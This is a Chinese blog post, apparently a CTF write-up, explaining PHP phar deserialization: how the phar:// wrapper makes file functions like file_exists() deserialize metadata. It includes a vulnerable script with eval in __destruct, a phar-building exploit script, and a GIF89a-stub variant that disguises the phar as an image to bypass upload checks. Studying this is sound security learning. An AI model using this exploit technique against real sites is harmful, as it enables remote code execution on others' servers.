标签:pap signature 没有 content file ima 依赖 题目 修改
最近比赛打的挺菜的,但是还是跟着师傅们学到了很多东西的,不管怎么样,还是踏踏实实一点点学,仔细写写PHP代码,不能浮于表面。
通常利用反序列化漏洞的时候,只能将反序列化后的字符串传入到unserialize()中,这种漏洞随着代码安全性的提高之后难以利用。在2018年的Black Hat会议上,Sam Thomas提出了利用phar文件会以序列化字符串的形式存储用户自定义的meta_data这一点特性,拓展了php反序列化漏洞的攻击。该方法依赖于文件系统的函数(file_exists()、is_dir()等)参数可控的情况下,配合phar://伪协议对phar文件内容的解析,自动反序列化meta_data中的内容,可以不依赖于unserialize()进行反序列化操作。
参考:https://paper.seebug.org/680/
在先说phar文件如何实现php反序列化攻击的之前,先要明白什么是phar文件以及phar文件的结构。
可以理解位一种标志,其格式为xxx<?php xxx;__HALT_COMPILER();?>
,前面的内容不限,但是一定要以__HALT_COMPILER();?>
来结尾,否则phar扩展无法识别这个文件,也就是说,phar扩展是以__HALT_COMPILER();?>
为标志来识别phar文件的。
phar文件的本质就是一种压缩文件,每个被压缩文件的权限,属性等信息都被存放在这里,另外,用户自定义的meta-data也会被储存在这里,这是实现phar文件攻击的核心。
被压缩的内容
文件签名,放在文件末尾。格式如下:
要攻击的站点源码如下:
<?php
class Flag{
public $code;
public function __destruct()
{
// TODO: Implement __destruct() method.
eval($this->code);
}
}
$filename = $_GET[‘filename‘];
file_exists($filename);
?>
传入文件名,检测该文件是否存在。
下面开始构造phar文件进行任意代码执行
;phar.readonly = On
修改为Off
即可,注意去掉;
。
<?php
class Flag{
public $code;
} //要攻击站点已存在的类
@unlink("test.phar"); //文件名 test.phar
$phar = new Phar("test.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置sub
$a = new Flag(); //实例化类,让phar文件自动序列化,利用phar文件自动序列化meta_data的特点进行攻击
$a->code = "phpinfo();";
$phar->setMetadata($a); //将自定义的meta_data存入manifest
$phar->addFromString("test.txt", "test"); //要压缩的文件
$phar->stopBuffering(); //自动计算签名
?>
执行完上述代码之后,会在本地这个php文件的同目录下生成一个phar文件。如下图:
用winhex查看该文件:
可以看到,我们自定义的meta_data以序列化字符串的形式存储在了phar文件里。有序列化必然会有反序列化,PHP的大部分文件系统函数在通过phar://协议解析phar文件的时候,都会将meta_data进行反序列化操作,受影响的文件系统函数如下:
利用phar文件以及phar://伪协议进行攻击:
实现了任意代码执行。
__HALT_COMPILER();?>
来识别phar文件的,也就是说,我们可以修改phar文件头前半部分的内容,来绕过某些检测。<?php
class Flag{
public $code;
} //要攻击站点已存在的类
@unlink("test.phar"); //文件名 test.phar
$phar = new Phar("test.phar");
$phar->startBuffering();
$phar->setStub("GIF89a<?php __HALT_COMPILER(); ?>"); //设置sub
$a = new Flag(); //实例化类,让phar文件自动序列化,利用phar文件自动序列化meta_data的特点进行攻击
$a->code = "phpinfo();";
$phar->setMetadata($a); //将自定义的meta_data存入manifest
$phar->addFromString("test.txt", "test"); //要压缩的文件
$phar->stopBuffering(); //自动计算签名
?>
在sub中新增加了GIF89a
这部分,将phar文件伪装成GIF文件来绕过某些检测。
将生成的test.phar文件修改后缀名,改为test.gif,再次进行测试:
phar
、:
、/
等关键字没有被过滤。/vulnerable.php
看看。<?php
highlight_file(__FILE__);
if (isset($_GET[‘filename‘])) {
$filename = $_GET[‘filename‘];
} else {
$filename = "";
}
class Flag
{
private $code;
function __destruct()
{
// TODO: Implement __destruct() method.
eval($this->code);
}
}
if (file_exists($filename)) {
echo "文件存在的呢;";
} else {
echo "啊这,文件不在哦";
}
?>
__destruct()
方法来执行任意代码,但是没有unserialize()函数,要想调用魔术方法,结合题目一开始的文件上传,很容易想到phar文件的上传。比赛当时拿到这道题目没有一点思路,多亏了一位师傅提醒“一个phar文件的上传”,才拿到了Flag,故有此文。
标签:pap signature 没有 content file ima 依赖 题目 修改
原文地址:https://www.cnblogs.com/hello-there/p/12968850.html